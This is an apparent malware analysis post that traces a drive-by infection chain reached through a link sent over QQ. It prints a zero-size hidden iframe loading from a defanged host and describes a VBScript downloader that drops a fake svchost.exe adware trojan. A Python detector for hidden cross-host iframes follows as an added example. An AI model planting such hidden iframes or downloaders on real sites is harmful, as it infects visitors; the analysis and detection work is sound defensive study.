Endurer original
Version 2: added Kaspersky's response
Version 1
Received the URL hxxp://hiuz***uo*ai.cn/ via QQ.
The webpage hxxp://hiuz***uo*ai.cn/ contains the code:
/-------
<IFRAME marginwidth=0 marginheight=0 src="hxxp://I***v*r.BT***fan.net/xskj.htm" frameborder=0 width=0 scrolling=No height=0></IFRAME>
-------/
The content of xskj.htm is a JavaScript program that outputs a VBScript program encoded with escape().
The VBScript uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the xskj.exe file, saves it as %Temp%/svchost.exe, and then calls the custom function yunxingexe(M5, xskj9).
The custom function yunxingexe() creates the Shell.Application object xskjc and runs %Temp%/svchost.exe using the ShellExecute method of xskjc.
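The zero-size iframe shown above is the entry point of this chain, and it is the easiest part to catch when auditing a page. The following is an added example, not code from the original post: it lists iframes that are invisible to the user and load from a host other than the page's own. The sample HTML, the example.test hosts and the function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ZERO = re.compile(r"^\s*0+(\.0+)?\s*(px|%)?\s*$", re.I)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Constructed sample page and URL; the example.test hosts are placeholders.
PAGE_URL = "hxxp://portal.example.test/"
SAMPLE = """<html><body>
<IFRAME marginwidth=0 marginheight=0 src="hxxp://dropper.example.test/landing.htm" frameborder=0 width=0 scrolling=No height=0></IFRAME>
<iframe src="/local/banner.htm" width="0" height="0"></iframe>
<iframe src="http://video.example.test/embed" width="640" height="360"></iframe>
<iframe src="http://ads.example.test/t.htm" style="display:none"></iframe>
</body></html>"""

def host_of(url):
    """Hostname of a URL, accepting the defanged hxxp:// form; None if relative."""
    return urlparse(re.sub(r"^hxxp", "http", url.strip(), flags=re.I)).hostname

class IframeAudit(HTMLParser):
    """Records each <iframe> with the reasons it is invisible or off-site."""
    def __init__(self, page_url):
        super().__init__()
        self.page_host = host_of(page_url)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if ZERO.match(a.get("width", "")) and ZERO.match(a.get("height", "")):
            reasons.append("zero-size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        host = host_of(a.get("src", ""))
        if host and host != self.page_host:
            reasons.append("cross-host")
        self.findings.append({"src": a.get("src", "").strip(), "reasons": reasons})

def suspicious_iframes(html, page_url):
    """Iframes that are both invisible and loaded from another host."""
    audit = IframeAudit(page_url)
    audit.feed(html)
    return [f for f in audit.findings if "cross-host" in f["reasons"]
            and {"zero-size", "hidden-style"} & set(f["reasons"])]

if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE, PAGE_URL):
        print(hit["src"], hit["reasons"])
```

Same-host zero-size frames and visible third-party embeds are deliberately not reported, which keeps the output to the pattern this page describes.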
xskj.exe was developed using Microsoft Visual Basic 5.0/6.0.
/-------
File Description: D:/test/xskj.exe
Attribute: ---
Language: Chinese (China)
File version: 1.00
Note: svch0st
Copyright: svch0st
Note: svch0st
Product: 1.00
Product Name: svch0st
Company Name: svch0st
Legal trademark: svch0st
Internal name: xc0py
Source File Name: xc0py.exe
Creation Time:
Modification time:
Access time:
Size: 40960 bytes, 40.0 KB
MD5: 20618f0ff18554c840b74494b5e8594c
-------/
Its main functions are:
/-------
1. Create the startup item svch0st under the Run key of the registry so that it starts automatically at boot.
2. Modify the hosts file.
3. Modify the registry so that the IE homepage is changed to hxxp://I***v*R.BT***fan.net/index.html and users cannot change the homepage through Internet Options.
4. Pop up advertisement windows.
-------/
Rising reports: Trojan.Clicker.VB.ajn.
Rising upgrade report: version 192.167.02 can detect 82 new viruses
Source: Rising    Time: 16:01:05
http://it.rising.com.cn/Channels/Anti_Virus/Upgrade_Report/2007-01-22/1169456324d40068.shtml
It is listed in 59th position.
Kaspersky reports: Trojan.Win32.StartPage.ana